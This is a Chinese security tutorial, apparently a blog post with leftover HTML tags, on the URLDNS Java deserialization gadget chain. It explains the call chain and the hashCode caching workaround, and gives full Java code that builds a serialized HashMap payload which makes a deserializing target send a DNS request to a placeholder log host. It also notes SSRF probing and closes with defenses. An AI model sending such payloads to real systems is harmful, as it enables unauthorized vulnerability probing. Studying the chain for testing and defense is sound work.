Java反序列化漏洞利用：URLDNS链详解<\/h1>

一、URLDNS链概述<\/h2>

URLDNS是ysoserial工具中最简单的一条反序列化利用链，具有以下显著优点：<\/p>

完全基于Java内置类构造，不依赖任何第三方库<\/li>
在目标没有回显时，可通过DNS请求验证漏洞存在<\/li>

简单可靠，适合作为反序列化漏洞的检测手段<\/li> <\/ol>

二、Java反序列化挖掘的三个关键方面<\/h2>

入口类<\/strong>：支持序列化且重写了readObject方法的类<\/li>
目标类<\/strong>：包含可利用方法的类<\/li>

执行函数<\/strong>：最终实现RCE、文件上传或SSRF等效果的方法<\/li> <\/ol>
三、URLDNS链核心原理分析<\/h2>
1. 调用链分析<\/h3>
完整的调用链如下：<\/p>
HashMap->readObject() HashMap->hash() URL->hashCode() URLStreamHandler->hashCode() URLStreamHandler->getHostAddress() InetAddress->getByName() <\/code><\/pre> 2. 关键类解析<\/h3> HashMap<\/strong>：重写了反序列化的readObject()方法<\/p> readObject()方法调用hash()方法<\/li> hash()方法调用Key值的hashCode方法<\/li> <\/ul> <\/li> URL类<\/strong>：<\/p> 可序列化且实现了hashCode方法<\/li> hashCode方法调用getHostAddress()<\/li> getHostAddress()最终调用InetAddress.getByName()，会发起DNS查询<\/li> <\/ul> <\/li> <\/ul> 四、技术细节与注意事项<\/h2> 1. put方法的干扰<\/h3> HashMap的put方法也会调用hash()方法，导致DNS请求提前触发：<\/p> hashmap.<\/span>put<\/span>(<\/span>url,<\/span>1<\/span>);<\/span> <\/span><\/span>\/\/ 实际调用链： <\/span><\/span><\/span>\/\/ HashMap.put() -> putVal() -> hash() -> URL.hashCode() <\/span><\/span><\/span><\/code><\/pre>这会带来两个问题：<\/p> 产生误报，让我们误以为反序列化成功<\/li> URL对象的hashCode会被缓存，导致后续反序列化时不再触发DNS请求<\/li> <\/ol> 2. hashCode缓存机制<\/h3> URL类的hashCode实现有缓存机制：<\/p> public<\/span> synchronized<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>hashCode !=<\/span> -<\/span>1<\/span>)<\/span> \/\/ 如果已计算过hashCode则直接返回 <\/span><\/span><\/span><\/span> return<\/span> hashCode;<\/span> <\/span><\/span> hashCode =<\/span> handler.<\/span>hashCode<\/span>(<\/span>this<\/span>);<\/span> \/\/ 首次计算 <\/span><\/span><\/span><\/span> return<\/span> hashCode;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 解决方案：反射修改hashCode<\/h3> 通过反射技术可以绕过hashCode缓存：<\/p> 创建URL对象后，立即用反射将其hashCode设为非-1的值<\/li> 执行put操作（此时不会触发DNS请求）<\/li> 再用反射将hashCode重置为-1<\/li> 序列化对象后，反序列化时会重新计算hashCode，触发DNS请求<\/li> <\/ol> 五、完整利用代码示例<\/h2> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 创建HashMap和URL对象 <\/span><\/span><\/span><\/span> HashMap<<\/span>URL,<\/span> Integer><\/span> hashmap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/yourdnslog.example.com"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 2. 获取URL类的Class对象 <\/span><\/span><\/span><\/span> Class c =<\/span> url.<\/span>getClass<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 3. 使用反射修改hashCode初始值 <\/span><\/span><\/span><\/span> Field hashCodeField =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span> <\/span><\/span> hashCodeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> 123<\/span>);<\/span> \/\/ 设为任意非-1值 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 4. 将URL对象放入HashMap（此时不会触发DNS） <\/span><\/span><\/span><\/span> hashmap.<\/span>put<\/span>(<\/span>url,<\/span> 1<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 5. 重置hashCode为-1，确保反序列化时重新计算 <\/span><\/span><\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 6. 序列化对象 <\/span><\/span><\/span><\/span> serialize(<\/span>hashmap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反序列化时会触发DNS请求 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>六、实际应用场景<\/h2> 漏洞检测<\/strong>：当目标系统存在反序列化漏洞但无回显时，可通过DNS日志确认漏洞<\/li> 无依赖探测<\/strong>：不依赖任何第三方库，适用于各种Java环境<\/li> SSRF探测<\/strong>：除了DNS请求，也可用于探测内网服务<\/li> <\/ol> 七、防御建议<\/h2> 避免反序列化不可信数据<\/li> 使用白名单机制限制可反序列化的类<\/li> 升级JDK，使用最新的安全补丁<\/li> 使用安全的替代方案如JSON、XML等数据格式<\/li> <\/ol> 八、总结<\/h2> URLDNS链是Java反序列化漏洞利用中最简单、最可靠的检测方式，通过精心构造的序列化对象，利用Java内置类的特性触发DNS请求，无需依赖第三方库即可验证漏洞存在。理解其原理不仅有助于安全测试，也能帮助开发者更好地防御此类漏洞。<\/p>